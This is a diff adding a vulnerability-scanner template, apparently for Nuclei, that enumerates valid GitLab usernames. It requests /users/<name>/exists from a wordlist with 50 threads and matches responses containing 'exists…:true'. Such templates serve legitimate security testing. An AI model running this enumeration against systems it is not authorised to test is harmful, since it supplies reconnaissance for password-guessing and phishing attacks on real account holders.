GitLab User Enumeration

vulnerabilities/gitlab/gitlab-user-enumeration.yaml

@@ -0,0 +1,31 @@
+id: gitlab-user-enumeration
+info: 
+  author: "Suman Kar"
+  name: "GitLab - User Enumeration"
+  severity: info
+  tags: "gitlab,enumeration"
+requests: 
+  - 
+    attack: sniper
+    matchers: 
+      - 
+        part: body
+        regex: 
+          - "exists.*:true"
+        type: regex
+      - 
+        status: 
+          - 200
+        type: status
+    matchers-condition: and
+    payloads: 
+      dlist: helpers/wordlists/user-list.txt
+    raw: 
+      - "GET /users/{{dlist}}/exists HTTP/1.1 \n\
+          Host: {{Hostname}}\n\
+          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0\n\
+          Accept-Language: en-US,en;q=0.9\n\
+          Accept: application/json, text/plain, */*\n\
+          Referer: {{BaseURL}}\n\
+          Connection: keep-alive \n"
+    threads: 50